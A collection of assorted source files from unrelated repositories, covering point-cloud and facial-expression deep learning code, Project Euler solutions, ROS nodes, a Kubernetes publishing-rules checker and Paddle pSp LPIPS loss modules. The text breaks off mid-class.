data = ('data' in options and options['data']) or ''
headers = ('headers' in options and convert(options['headers'])) or {'host': host}
auth = ('auth' in options and options['auth']) or ''
#_call(host, port, method, path, data, headers, callback)
thread = threading.Thread(target=_call, args=(host, port, auth, method, path, data, headers, callback))
thread.start()
def get(self, options, callback=None):
if(type(options) == str):
r = urllib.parse.urlparse(options)
options = {'hostname': r.hostname, 'port': r.port, 'path': r.path, 'method':'GET'}
if(r.username):
options.auth = r.username
if(r.password):
options.auth = options.auth + ':' + r.password
self.request(options, callback)
def exports():
return Http()
``` |
{
"source": "760146355/Pointnet_Pointnet2_pytorch",
"score": 2
} |
#### File: Pointnet_Pointnet2_pytorch/data_utils/S3DISDataLoader.py
```python
import os
from torch.utils.data import Dataset
import numpy as np
import h5py
classes = ['ceiling','floor','wall','beam','column','window','door','table','chair','sofa','bookcase','board','clutter']
class2label = {cls: i for i,cls in enumerate(classes)}
def getDataFiles(list_filename):
return [line.rstrip() for line in open(list_filename)]
def load_h5(h5_filename):
f = h5py.File(h5_filename)
data = f['data'][:]
label = f['label'][:]
return (data, label)
def loadDataFile(filename):
return load_h5(filename)
def recognize_all_data(test_area = 5):
ALL_FILES = getDataFiles('./data/indoor3d_sem_seg_hdf5_data/all_files.txt')
room_filelist = [line.rstrip() for line in open('./data/indoor3d_sem_seg_hdf5_data/room_filelist.txt')]
data_batch_list = []
label_batch_list = []
for h5_filename in ALL_FILES:
data_batch, label_batch = loadDataFile('./data/' + h5_filename)
data_batch_list.append(data_batch)
label_batch_list.append(label_batch)
data_batches = np.concatenate(data_batch_list, 0)
label_batches = np.concatenate(label_batch_list, 0)
test_area = 'Area_' + str(test_area)
train_idxs = []
test_idxs = []
for i, room_name in enumerate(room_filelist):
if test_area in room_name:
test_idxs.append(i)
else:
train_idxs.append(i)
train_data = data_batches[train_idxs, ...]
train_label = label_batches[train_idxs]
test_data = data_batches[test_idxs, ...]
test_label = label_batches[test_idxs]
print('train_data',train_data.shape,'train_label' ,train_label.shape)
print('test_data',test_data.shape,'test_label', test_label.shape)
return train_data,train_label,test_data,test_label
class S3DISDataLoader(Dataset):
def __init__(self, data, labels):
self.data = data
self.labels = labels
def __len__(self):
return len(self.data)
def __getitem__(self, index):
return self.data[index], self.labels[index]
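# Usage sketch (added for illustration; requires the indoor3d_sem_seg_hdf5_data files):
# from torch.utils.data import DataLoader
# train_data, train_label, test_data, test_label = recognize_all_data(test_area=5)
# train_loader = DataLoader(S3DISDataLoader(train_data, train_label), batch_size=16, shuffle=True)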
``` |
{
"source": "7636kei/PE-logbook",
"score": 3
} |
#### File: 7636kei/PE-logbook/PE00a.py
```python
import math
def checkprime(k):
prime_flag = True
for i in range(2, 1 + math.ceil(math.sqrt(k))):
if k % i == 0:
prime_flag = False
break
return prime_flag
def sumofprimes(targ_num):
#find the sum of all primes up to, and excluding, 'targ_num'
runsum = 0
if targ_num < 2:
runsum = 0 #no primes under 2, remember? 🤣
elif targ_num < 3:
runsum = 2 #nailed 2
elif targ_num < 5:
runsum = 2 + 3 #nailed 3 too
else:
runsum = 2 + 3
seed = 0 #for any prime p > 3, p % 6 = ±1
while seed < math.floor(targ_num/6):
seed = seed + 1
if(checkprime(6*seed - 1) == True):
runsum = runsum + 6*seed -1
if(checkprime(6*seed + 1) == True and targ_num > 6*seed + 1):
runsum = runsum + 6*seed + 1
return runsum
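# Quick sanity check of the 6k +/- 1 observation used above (illustration only):
# sumofprimes(10) == 2 + 3 + 5 + 7 == 17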
print(sumofprimes(2000000))
``` |
{
"source": "764994703/HCI-project",
"score": 2
} |
#### File: HCI-project/integrated system/PlayMp3.py
```python
import pyttsx3
import pygame
import random
import time
import os
import win32com
class PlayMp3:
def __init__(self):
pygame.mixer.init()
pygame.init()
def play(self, path):
if(pygame.mixer.music.get_busy()):
return
nextSound = pygame.mixer.Sound(path)
pygame.mixer.Channel(0).queue(nextSound)
# print(pygame.mixer.Channel(0).get_queue())
return
def emergentplay(self, path):
if(pygame.mixer.music.get_busy()):
return
pygame.mixer.Channel(0).stop()
pygame.mixer.music.load(path)
pygame.mixer.music.play()
def test():
x = PlayMp3()
x.noeyes()
x.noface()
x.tired()
if __name__ == "__main__":
test()
```
#### File: HCI-project/tensorflow/FER.py
```python
import tensorflow as tf
import pandas as pd
import numpy as np
import random
from PIL import Image
IMAGE_SIZE = 48
CLIPED_SIZE = 42
EMO_NUM = 7
TRAIN_SIZE = 4 * (35887 * 2 - 10000)
VALID_SIZE = 1500
TEST_SIZE = 5000
BATCH_SIZE = 50
NUM_CHANNEL = 1
EPOCHS = 50
SAVE_PATH = './saved_model'
emo_dict = {
0: 'Angry', 1: 'Disgust', 2: 'Fear', 3: 'Happy', 4: 'Sad', 5: 'Suprise', 6: 'Neutral'
}
def GetSymmetric(pixel, size):
'''
pixel: np array with shape (count,size,size,1)
'''
count = pixel.shape[0]
sym = np.zeros((count, size, size, NUM_CHANNEL))
for i in range(count):
for j in range(size):
for k in range(size):
sym[i, j, k, 0] = pixel[i, j, size - k - 1, 0]
return sym
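# Note (added): the loop above is just a horizontal flip, i.e. for inputs of the
# expected shape it is equivalent to np.flip(pixel, axis=2).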
def GetClipedImage(pixel, start):
'''
pixel: raw 48*48 pixel data with shape (count, 48, 48, 1)
start: a tuple such as (0,0),(2,3),(4,2), represents start point of clipped 42*42 image
'''
count = pixel.shape[0]
out = np.zeros((count, CLIPED_SIZE, CLIPED_SIZE, NUM_CHANNEL))
for i in range(count):
for j in range(CLIPED_SIZE):
out[i, j, :, 0] = pixel[i, start[0] + j, start[1]:start[1] + CLIPED_SIZE, 0]
return out
def GetInput():
all_data = pd.read_csv('fer2013.csv')
label = np.array(all_data['emotion'])
data = np.array(all_data['pixels'])
sample_count = len(label) # should be 35887
    pixel_data = np.zeros((sample_count, IMAGE_SIZE * IMAGE_SIZE))  # pixel data
    label_data = np.zeros((sample_count, EMO_NUM), dtype=int)  # one-hot label data
for i in range(sample_count):
x = np.fromstring(data[i], sep=' ')
max = x.max()
        x = x / (max + 0.001)  # normalize grayscale values
pixel_data[i] = x
label_data[i, label[i]] = 1
pixel_data = pixel_data.reshape(sample_count, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNEL)
x_test = pixel_data[30000:35000]
y_test = label_data[30000:35000]
x_train = np.concatenate((pixel_data[0:30000], pixel_data[35000:]), axis=0)
symmetric_x_train = GetSymmetric(x_train, IMAGE_SIZE)
x_train = np.concatenate((x_train, symmetric_x_train), axis=0)
y_train = np.concatenate((label_data[0:30000], label_data[35000:], label_data[0:30000], label_data[35000:]))
return (x_train, y_train, x_test, y_test)
def DataPreprocess(pixel, label=[]):
'''
pixel: pixel data with shape (count,48,48,1)
label: optical, corresponding label of pixel
'''
a = random.randint(0, 2)
b = random.randint(3, 5)
c = random.randint(0, 2)
d = random.randint(3, 5)
pixel1 = GetClipedImage(pixel, (a, c))
pixel2 = GetClipedImage(pixel, (a, d))
pixel3 = GetClipedImage(pixel, (b, c))
pixel4 = GetClipedImage(pixel, (b, d))
out_p = np.concatenate((pixel1, pixel2, pixel3, pixel4), axis=0)
if len(label) == 0:
return out_p
else:
out_l = np.concatenate((label, label, label, label), axis=0)
return (out_p, out_l)
def model(data, keep_prob):
# first layer IN: 42*42*1 OUT: 20*20*32
kernel1 = tf.Variable(tf.truncated_normal([5, 5, NUM_CHANNEL, 32], stddev=5e-2))
conv1 = tf.nn.conv2d(data, kernel1, [1, 1, 1, 1], padding='SAME')
bias1 = tf.Variable(tf.zeros([32]))
relu1 = tf.nn.relu(tf.nn.bias_add(conv1, bias1))
pool1 = tf.nn.max_pool(relu1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='VALID')
# second layer IN: 20*20*32 OUT: 10*10*32
kernel2 = tf.Variable(tf.truncated_normal([4, 4, 32, 32], stddev=5e-2))
conv2 = tf.nn.conv2d(pool1, kernel2, [1, 1, 1, 1], padding='SAME')
bias2 = tf.Variable(tf.zeros([32]))
relu2 = tf.nn.relu(tf.nn.bias_add(conv2, bias2))
pool2 = tf.nn.max_pool(relu2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
# third layer IN: 10*10*32 OUT: 5*5*64
kernel3 = tf.Variable(tf.truncated_normal([5, 5, 32, 64], stddev=5e-2))
conv3 = tf.nn.conv2d(pool2, kernel3, [1, 1, 1, 1], padding='SAME')
bias3 = tf.Variable(tf.zeros([64]))
relu3 = tf.nn.relu(tf.nn.bias_add(conv3, bias3))
pool3 = tf.nn.max_pool(relu3, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
# fully connected layers
fc1_data = tf.reshape(pool3, shape=[-1, 5 * 5 * 64])
fc1 = tf.contrib.layers.fully_connected(fc1_data, 1024, activation_fn=tf.nn.relu)
fc1_out = tf.nn.dropout(fc1, keep_prob)
fc2 = tf.contrib.layers.fully_connected(fc1_out, 512, activation_fn=tf.nn.relu)
fc2_out = tf.nn.dropout(fc2, keep_prob)
logits = tf.contrib.layers.fully_connected(fc2_out, 7, activation_fn=None)
logits = tf.identity(logits, name='LOGITS')
return logits
def train(x_train, y_train, x_val, y_val):
x_data = tf.placeholder(tf.float32, shape=(None, CLIPED_SIZE, CLIPED_SIZE, NUM_CHANNEL), name='INPUT')
y_data = tf.placeholder(tf.int16, shape=(None, EMO_NUM), name='LABEL')
keep_prob = tf.placeholder(tf.float32, name='KEEP')
y_pred = model(x_data, keep_prob)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=y_pred, labels=y_data))
global_step = tf.Variable(0)
learning_rate = tf.train.exponential_decay(0.1, global_step, 300, 0.99, staircase=True)
# optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost, global_step=global_step)
optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost, global_step=global_step)
correct_pred = tf.equal(tf.argmax(y_pred, 1), tf.argmax(y_data, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32), name='ACCURACY')
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
step = 0
for epoch in range(EPOCHS):
for batch_i in range(TRAIN_SIZE // BATCH_SIZE):
step += 1
x_feats = x_train[batch_i * BATCH_SIZE: (batch_i + 1) * BATCH_SIZE]
y_feats = y_train[batch_i * BATCH_SIZE: (batch_i + 1) * BATCH_SIZE]
feed = {x_data: x_feats, y_data: y_feats, keep_prob: 0.6}
sess.run(optimizer, feed_dict=feed)
if step % 128 == 0:
(loss, acc) = sess.run([cost, accuracy], feed_dict=feed)
feed_v = {x_data: x_val, y_data: y_val, keep_prob: 1.0}
acc_v = sess.run(accuracy, feed_dict=feed_v)
print("In epoch %d, batch %d, loss: %.3f, accuracy: %.3f, validation accuracy: %.3f" % (
epoch, batch_i, loss, acc, acc_v))
saver = tf.train.Saver()
saver_path = saver.save(sess, SAVE_PATH)
print('Finished!')
def test(x_test, y_test):
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph) as sess:
# load the model
loader = tf.train.import_meta_graph(SAVE_PATH + '.meta')
loader.restore(sess, SAVE_PATH)
load_x = loaded_graph.get_tensor_by_name('INPUT:0')
load_y = loaded_graph.get_tensor_by_name('LABEL:0')
load_acc = loaded_graph.get_tensor_by_name('ACCURACY:0')
load_log = loaded_graph.get_tensor_by_name('LOGITS:0')
load_keep = loaded_graph.get_tensor_by_name('KEEP:0')
# record accuracy
total_batch_acc = 0
batch_count = TEST_SIZE // BATCH_SIZE
(x_test, y_test) = DataPreprocess(x_test, y_test)
for batch_i in range(batch_count):
log = np.zeros((BATCH_SIZE, EMO_NUM))
y_feats = y_test[batch_i * BATCH_SIZE: (batch_i + 1) * BATCH_SIZE]
for k in range(4):
x_feats = x_test[batch_i * BATCH_SIZE + k * TEST_SIZE: (batch_i + 1) * BATCH_SIZE + k * TEST_SIZE]
log1 = sess.run(load_log, feed_dict={
load_x: x_feats, load_y: y_feats, load_keep: 1.0
})
x_feats = GetSymmetric(x_feats, CLIPED_SIZE)
log2 = sess.run(load_log, feed_dict={
load_x: x_feats, load_y: y_feats, load_keep: 1.0
})
log += log1 + log2
emos = sess.run(tf.argmax(log, 1))
correct_emos = sess.run(tf.argmax(y_feats, 1))
tmp = emos == correct_emos
acc = tmp.sum() / tmp.shape[0]
total_batch_acc += acc
print('In test batch %d: the accuracy is %.3f' % (batch_i, acc))
print('Total accuracy in test set is %.3f' % (total_batch_acc / batch_count))
def classify(files):
'''
    files: list of image paths to classify; relative paths in the same directory are fine, e.g. ['im1.jpg', 'im2.jpg']
    pixels are extracted with Pillow's Image module
'''
file_count = len(files)
pixel = np.zeros((file_count, IMAGE_SIZE * IMAGE_SIZE))
for file_index in range(file_count):
im = Image.open(files[file_index]).convert('L')
im = im.resize((IMAGE_SIZE, IMAGE_SIZE))
for i in range(IMAGE_SIZE * IMAGE_SIZE):
pixel[file_index, i] = im.getpixel((i // IMAGE_SIZE, i % IMAGE_SIZE))
pixel[file_index] = pixel[file_index] / (pixel[file_index].max() + 0.001)
pixel = pixel.reshape(file_count, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNEL)
pixel = DataPreprocess(pixel)
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph) as sess:
loader = tf.train.import_meta_graph(SAVE_PATH + '.meta')
loader.restore(sess, SAVE_PATH)
load_x = loaded_graph.get_tensor_by_name('INPUT:0')
load_y = loaded_graph.get_tensor_by_name('LABEL:0')
load_log = loaded_graph.get_tensor_by_name('LOGITS:0')
load_keep = loaded_graph.get_tensor_by_name('KEEP:0')
logit = sess.run(load_log, feed_dict={
load_x: pixel, load_y: np.zeros((file_count * 4, EMO_NUM)), load_keep: 1.0
})
log = np.zeros((file_count, EMO_NUM))
for i in range(4):
log += logit[i * file_count:(i + 1) * file_count]
emos = sess.run(tf.argmax(log, 1))
for emo in emos:
print(emo_dict[emo])
if __name__ == '__main__':
(x_train, y_train, x_test, y_test) = GetInput()
print(x_train.shape)
(x_train, y_train) = DataPreprocess(x_train, y_train)
print(x_train.shape)
print('Start!')
x_val = x_test[0:500]
y_val = y_test[0:500]
(x_val, y_val) = DataPreprocess(x_val, y_val)
train(x_train, y_train, x_val, y_val)
print(x_test.shape)
test(x_test, y_test)
``` |
{
"source": "766F6964/Euler-Problems",
"score": 4
} |
#### File: Euler-Problems/Python/Problem002.py
```python
def fibonacci_sequence():
a, b, sum = 0, 1, 0
while a < 4000000:
if a % 2 == 0:
sum += a
a, b = b, a + b
return sum
print(fibonacci_sequence())
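# An equivalent approach (added for illustration): even Fibonacci terms satisfy
# E(n) = 4*E(n-1) + E(n-2), so they can be generated directly.
def even_fibonacci_sum(limit=4000000):
    a, b, total = 2, 8, 0
    while a < limit:
        total += a
        a, b = b, 4 * b + a
    return total
# even_fibonacci_sum() == fibonacci_sequence() == 4613732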
```
#### File: Euler-Problems/Python/Problem004.py
```python
def largest_palindrome():
for x in range(0, 1000):
for k in range(0, 1000):
if(str(x*k) == str(x*k)[::-1]):
yield x*k
print(max(largest_palindrome()))
```
#### File: Euler-Problems/Python/Problem005.py
```python
def greatest_common_divisor(a, b):
return b and greatest_common_divisor(b, a % b) or a
def least_common_multiple(a, b):
return a * b / greatest_common_divisor(a,b)
def smallest_multiple(k):
n = 1
for i in range(1, k + 1):
n = least_common_multiple(n, i)
return int(n)
print(smallest_multiple(20))
```
#### File: Euler-Problems/Python/Problem015.py
```python
def count_lattice_paths(size):
x = [1] * size
for k in range(0, size):
for n in range(0, k):
x[n] = x[n] + x[n - 1]
x[k] = 2 * x[k - 1]
return x[size - 1]
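# Sanity check (added for illustration): a 2x2 grid has C(4, 2) = 6 monotone paths,
# and count_lattice_paths(2) returns 6.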
print(count_lattice_paths(20))
```
#### File: Euler-Problems/Python/Problem021.py
```python
def get_divisors(n):
sum = 1
for i in range(2, int(n ** 0.5 + 1)):
if n % i == 0:
sum += i
sum += n / i
return sum
def find_amicable_pair():
total = 0
for x in range(1, 10001):
a = get_divisors(x)
b = get_divisors(a)
if b == x and x != a:
total += x
return total
print(find_amicable_pair())
``` |
{
"source": "7675t/jog_twist",
"score": 3
} |
#### File: jog_twist/script/joy_to_twist.py
```python
import rospy
from geometry_msgs.msg import TwistStamped
from sensor_msgs.msg import Joy
class joy_to_twist:
def __init__(self):
self.pub = rospy.Publisher('cmd_vel', TwistStamped, queue_size=1)
# Convert to TwistStamped and republish
def callback(self, joy):
ts = TwistStamped()
ts.header.stamp = rospy.Time.now()
# These buttons are binary
ts.twist.linear.x = -joy.buttons[4] + joy.buttons[5]
# Double buttons
ts.twist.linear.y = joy.axes[0]
ts.twist.linear.z = joy.axes[1]
ts.twist.angular.x = -joy.axes[3]
ts.twist.angular.y = joy.axes[4]
# These buttons are binary
ts.twist.angular.z = -joy.buttons[0] + joy.buttons[1]
self.pub.publish(ts)
def republish(self):
rospy.Subscriber("joy", Joy, self.callback)
rospy.spin()
if __name__ == '__main__':
rospy.init_node('joy_to_twist', anonymous=True)
republisher = joy_to_twist()
republisher.republish()
``` |
{
"source": "7675t/nextage_recognition",
"score": 2
} |
#### File: nextage_recognition/script/gaze_plane_projector.py
```python
import rospy
import tf
from tf import TransformListener
from geometry_msgs.msg import PointStamped, Vector3Stamped
# input geometry_msgs/Vector3Stamped
# 平面はframe_idをパラメータで与え、その座標系のxy平面とする
# output geometry_msgs/PointStamped
# rotate vector v1 by quaternion q1
def qv_mult(q1, v1):
v1 = tf.transformations.unit_vector(v1)
q2 = list(v1)
q2.append(0.0)
return tf.transformations.quaternion_multiply(
tf.transformations.quaternion_multiply(q1, q2),
tf.transformations.quaternion_conjugate(q1)
)[:3]
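# Quick check (illustration only): rotating the x axis by 90 degrees about z yields
# the y axis, e.g.
# q = tf.transformations.quaternion_about_axis(1.5707963, (0, 0, 1))
# qv_mult(q, (1, 0, 0))  # ~ [0, 1, 0]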
class VectorPlaneProjector:
def __init__(self):
self.nh = rospy.init_node('vector_plane_projector')
self.tf = TransformListener()
self.plane_frame_id = rospy.get_param('~plane_frame_id', 'map')
rospy.Subscriber("gaze_vector", Vector3Stamped, self.vector_cb)
self.pub_ = rospy.Publisher('~point', PointStamped, queue_size=1)
def vector_cb(self, vector_msg):
vector_frame_id = vector_msg.header.frame_id
self.tf.waitForTransform(
self.plane_frame_id, vector_frame_id, rospy.Time(0), rospy.Duration(1.0))
vector = self.tf.transformVector3(self.plane_frame_id, vector_msg)
position, quaternion = self.tf.lookupTransform(self.plane_frame_id, vector_frame_id, rospy.Time(0))
# calculate projected point
# a x + b y + c z = d
# x = ax t + dx, y = ay t + dy , z = az t + dz
(ax, ay, az) = (vector.vector.x, vector.vector.y, vector.vector.z)
(dx, dy, dz) = position
        # find the intersection with the z = 0 plane
        # no intersection exists
if az == 0:
return
t = - dz / az
x = ax * t + dx
y = ay * t + dy
point = PointStamped()
point.header = vector.header
point.point.x = x
point.point.y = y
point.point.z = 0
self.pub_.publish(point)
if __name__ == '__main__':
node = VectorPlaneProjector()
rospy.spin()
``` |
{
"source": "767829413/kubernetes",
"score": 2
} |
#### File: kubernetes/hack/verify-publishing-bot.py
```python
from __future__ import print_function
import fnmatch
import os
import sys
import json
def get_gomod_dependencies(rootdir, components):
all_dependencies = {}
for component in components:
with open(os.path.join(rootdir, component, "go.mod")) as f:
print(component + " dependencies")
all_dependencies[component] = []
lines = list(set(f))
lines.sort()
for line in lines:
for dep in components:
if dep == component:
continue
if ("k8s.io/" + dep + " =>") not in line:
continue
print("\t"+dep)
if dep not in all_dependencies[component]:
all_dependencies[component].append(dep)
return all_dependencies
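# For illustration (hypothetical go.mod content): a replace directive such as
# "k8s.io/api => ../api" inside staging/src/k8s.io/client-go/go.mod is what makes
# "api" get recorded as a dependency of "client-go" by the loop above.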
def get_rules_dependencies(rules_file):
import yaml
with open(rules_file) as f:
data = yaml.safe_load(f)
return data
def main():
rootdir = os.path.dirname(__file__) + "/../"
rootdir = os.path.abspath(rootdir)
components = []
for component in os.listdir(rootdir + '/staging/src/k8s.io/'):
components.append(component)
components.sort()
rules_file = "/staging/publishing/rules.yaml"
try:
import yaml
except ImportError:
print("Please install missing pyyaml module and re-run %s" % sys.argv[0])
sys.exit(1)
rules_dependencies = get_rules_dependencies(rootdir + rules_file)
gomod_dependencies = get_gomod_dependencies(rootdir + '/staging/src/k8s.io/', components)
processed_repos = []
for rule in rules_dependencies["rules"]:
branch = rule["branches"][0]
# If this no longer exists in master
if rule["destination"] not in gomod_dependencies:
# Make sure we don't include a rule to publish it from master
for branch in rule["branches"]:
if branch["name"] == "master":
raise Exception("cannot find master branch for destination %s" % rule["destination"])
# And skip validation of publishing rules for it
continue
if branch["name"] != "master":
raise Exception("cannot find master branch for destination %s" % rule["destination"])
if branch["source"]["branch"] != "master":
raise Exception("cannot find master source branch for destination %s" % rule["destination"])
# we specify the go version for all master branches through `default-go-version`
# so ensure we don't specify explicit go version for master branch in rules
if "go" in branch:
raise Exception("go version must not be specified for master branch for destination %s" % rule["destination"])
print("processing : %s" % rule["destination"])
if rule["destination"] not in gomod_dependencies:
raise Exception("missing go.mod for %s" % rule["destination"])
processed_repos.append(rule["destination"])
processed_deps = []
for dep in set(gomod_dependencies[rule["destination"]]):
found = False
if "dependencies" in branch:
for dep2 in branch["dependencies"]:
processed_deps.append(dep2["repository"])
if dep2["branch"] != "master":
raise Exception("Looking for master branch and found : %s for destination", dep2,
rule["destination"])
if dep2["repository"] == dep:
found = True
else:
raise Exception(
"Please add %s as dependencies under destination %s in %s" % (gomod_dependencies[rule["destination"]], rule["destination"], rules_file))
if not found:
raise Exception("Please add %s as a dependency under destination %s in %s" % (dep, rule["destination"], rules_file))
else:
print(" found dependency %s" % dep)
extraDeps = set(processed_deps) - set(gomod_dependencies[rule["destination"]])
if len(extraDeps) > 0:
raise Exception("extra dependencies in rules for %s: %s" % (rule["destination"], ','.join(str(s) for s in extraDeps)))
items = set(gomod_dependencies.keys()) - set(processed_repos)
if len(items) > 0:
raise Exception("missing rules for %s" % ','.join(str(s) for s in items))
print("Done.")
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "77007f/CNN",
"score": 3
} |
#### File: CNN/scripts/main.py
```python
from PIL import Image
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
from keras.models import Model # basic class for specifying and training a neural network
from keras.layers import Input, Convolution2D, MaxPooling2D, Dense, Dropout, Activation, Flatten
from keras.utils import np_utils # utilities for one-hot encoding of ground truth values
import numpy as np
import random as rand
from keras.models import load_model
from keras.callbacks import ModelCheckpoint
import keras
'''
Reads the accuracies of the three generated models.
Each accuracy is a single value stored in accuracy1.txt, accuracy2.txt and accuracy3.txt.
All of these files live in the accuracy folder in the parent directory of the scripts folder.
'''
def get_accuracies():
filename = "../accuracy/accuracy1.txt"
with open(filename) as f:
accuracy1 = float(f.readline())
filename = "../accuracy/accuracy1.txt"
with open(filename) as f:
accuracy2 = float(f.readline())
filename = "../accuracy/accuracy1.txt"
with open(filename) as f:
accuracy3 = float(f.readline())
return accuracy1, accuracy2, accuracy3
'''
This function read all the images from test_images
It return a list containing name of all the test_images and their matrix representation in numpy array
'''
def read_input():
folder = "../test_images/"
FILE_NAMES = os.listdir(folder)
NEW_FILE_NAMES = []
for i in range(len(FILE_NAMES)):
im = Image.open(folder + FILE_NAMES[i])
im = im.resize((256, 256))
im.save(folder + "256X256_"+FILE_NAMES[i])
NEW_FILE_NAMES.append("256X256_"+FILE_NAMES[i])
read = lambda imname: np.asarray(Image.open(imname).convert("RGB"))
ims = [read(os.path.join(folder, filename)) for filename in NEW_FILE_NAMES]
for i in NEW_FILE_NAMES:
os.remove(folder+i)
X_test = np.array(ims, dtype='float32')
X_test /= np.max(X_test)
return FILE_NAMES,X_test
# Main Code begins here
if __name__ == "__main__":
# Read Accuracies of all the models
accuracy1, accuracy2, accuracy3 = get_accuracies()
# Read the input data
FILE_NAMES,X_test = read_input()
# Reading Model 1
model1 = load_model('../model/model1.h5')
prediction=model1.predict( X_test, batch_size=32, verbose=0)
y1_classes = prediction.argmax(axis=-1)
# Reading Model 2
model2 = load_model('../model/model2.h5')
prediction=model2.predict( X_test, batch_size=32, verbose=0)
y2_classes = prediction.argmax(axis=-1)
# Reading Model 3
model3 = load_model('../model/model3.h5')
prediction=model3.predict( X_test, batch_size=32, verbose=0)
y3_classes = prediction.argmax(axis=-1)
# Prediction using ensembling
for i in range(len(y1_classes)):
y1 = y1_classes[i]
y2 = y2_classes[i]
y3 = y3_classes[i]
Count = [0,0,0,0,0]
Count[y1] += 1
Count[y2] += 1
Count[y3] += 1
found = False
for j in range(len(Count)):
if Count[j] >= 2:
found = True
print(FILE_NAMES[i],"\t",j+1)
break
if not found:
if max(accuracy1,accuracy2,accuracy3) == accuracy1:
print(FILE_NAMES[i],"\t",y1+1)
elif max(accuracy1,accuracy2,accuracy3) == accuracy2:
print(FILE_NAMES[i],"\t",y2+1)
else:
print(FILE_NAMES[i],"\t",y3+1)
``` |
{
"source": "771979972/Paddle-pSp",
"score": 2
} |
#### File: Paddle-pSp/datasets/gt_res_dataset.py
```python
import os
from paddle.io import Dataset
from PIL import Image
class GTResDataset(Dataset):
def __init__(self, root_path, gt_dir=None, transform=None, transform_train=None):
self.pairs = []
for f in os.listdir(root_path):
image_path = os.path.join(root_path, f)
gt_path = os.path.join(gt_dir, f)
if f.endswith(".jpg") or f.endswith(".png"):
# self.pairs.append([image_path, gt_path.replace('.png', '.jpg'), None])
self.pairs.append([image_path, gt_path, None])
self.transform = transform
self.transform_train = transform_train
def __len__(self):
return len(self.pairs)
def __getitem__(self, index):
from_path, to_path, _ = self.pairs[index]
from_im = Image.open(from_path).convert('RGB')
to_im = Image.open(to_path).convert('RGB')
if self.transform:
to_im = self.transform(to_im)
from_im = self.transform(from_im)
return from_im, to_im
```
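A minimal usage sketch for `GTResDataset`; the directory paths and the transform pipeline below are illustrative assumptions, not part of the original repo:
```python
# Hypothetical sketch: iterate over (result, ground-truth) image pairs.
import paddle.vision.transforms as T
from paddle.io import DataLoader
from datasets.gt_res_dataset import GTResDataset

transform = T.Compose([T.Resize((256, 256)), T.ToTensor()])
dataset = GTResDataset(root_path="./results", gt_dir="./gt", transform=transform)
loader = DataLoader(dataset, batch_size=4, shuffle=False)
for result_batch, gt_batch in loader:
    print(result_batch.shape, gt_batch.shape)  # e.g. [4, 3, 256, 256] each
    break
```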
#### File: loss/lpips/lpips.py
```python
import paddle
import paddle.nn as nn
from configs.paths_config import model_paths
from models.loss.lpips.networks import get_network, LinLayers
class LPIPS(nn.Layer):
r"""Creates a criterion that measures
Learned Perceptual Image Patch Similarity (LPIPS).
Arguments:
net_type (str): the network type to compare the features:
'alex' | 'squeeze' | 'vgg'. Default: 'alex'.
version (str): the version of LPIPS. Default: 0.1.
"""
def __init__(self, net_type: str = 'alex', version: str = '0.1'):
assert version in ['0.1'], 'v0.1 is only supported now'
super(LPIPS, self).__init__()
# pretrained network
self.net = get_network(net_type)
# linear layers
self.lin = LinLayers(self.net.n_channels_list)
self.lin.set_state_dict(paddle.load(model_paths['lin_alex0.1']))
def forward(self, x: paddle.Tensor, y: paddle.Tensor):
feat_x, feat_y = self.net(x), self.net(y)
diff = [(fx - fy) ** 2 for fx, fy in zip(feat_x, feat_y)]
res = [l(d).mean((2, 3), True) for d, l in zip(diff, self.lin.model.sublayers())]
return paddle.sum(paddle.concat(res, 0)) / x.shape[0]
```
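A brief, hypothetical usage sketch for the `LPIPS` criterion above; it assumes the weights referenced by `model_paths['alexnet']` and `model_paths['lin_alex0.1']` are available locally, and uses random tensors in place of real image batches:
```python
# Hypothetical sketch: compute the perceptual distance between two image batches.
import paddle
from models.loss.lpips.lpips import LPIPS

lpips_loss = LPIPS(net_type='alex')   # AlexNet backbone, LPIPS v0.1
x = paddle.rand([4, 3, 256, 256])     # e.g. generated images, NCHW
y = paddle.rand([4, 3, 256, 256])     # e.g. ground-truth images
dist = lpips_loss(x, y)               # mean perceptual distance over the batch
print(float(dist))
```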
#### File: loss/lpips/networks.py
```python
from typing import Sequence
from itertools import chain
import paddle
import paddle.nn as nn
from paddle.vision import models
from configs.paths_config import model_paths
from models.loss.lpips.utils import normalize_activation
def get_network(net_type: str):
if net_type == 'alex':
return AlexNet()
elif net_type == 'squeeze':
return SqueezeNet()
elif net_type == 'vgg':
return VGG16()
else:
raise NotImplementedError('choose net_type from [alex, squeeze, vgg].')
class LinLayers(nn.Layer):
def __init__(self, n_channels_list: Sequence[int]):
super(LinLayers, self).__init__()
layers = [nn.Conv2D(nc, 1, 1, 1, 0, bias_attr=False) for nc in n_channels_list]
self.model = nn.Sequential(*layers)
class BaseNet(nn.Layer):
def __init__(self):
super(BaseNet, self).__init__()
# register buffer
self.register_buffer(
'mean', paddle.to_tensor([-.030, -.088, -.188]).reshape([1, 3, 1, 1]))
self.register_buffer(
'std', paddle.to_tensor([.458, .448, .450]).reshape([1, 3, 1, 1]))
def set_requires_grad(self, state: bool):
for param in chain(self.parameters()):
param.trainable = state
def z_score(self, x: paddle.Tensor):
return (x - self.mean) / self.std
def forward(self, x: paddle.Tensor):
x = self.z_score(x)
output = []
for i, (_, layer) in enumerate(self.layers._sub_layers.items(), 1):
x = layer(x)
if i in self.target_layers:
output.append(normalize_activation(x))
if len(output) == len(self.target_layers):
break
return output
class SqueezeNet(BaseNet):
def __init__(self):
super(SqueezeNet, self).__init__()
self.layers = models.squeezenet1_1(True).features
self.target_layers = [2, 5, 8, 10, 11, 12, 13]
self.n_channels_list = [64, 128, 256, 384, 384, 512, 512]
self.set_requires_grad(False)
class alexnet(nn.Layer):
def __init__(self, num_classes: int = 1000) -> None:
super(alexnet, self).__init__()
self.features = nn.Sequential(
nn.Conv2D(3, 64, kernel_size=11, stride=4, padding=2),
nn.ReLU(),
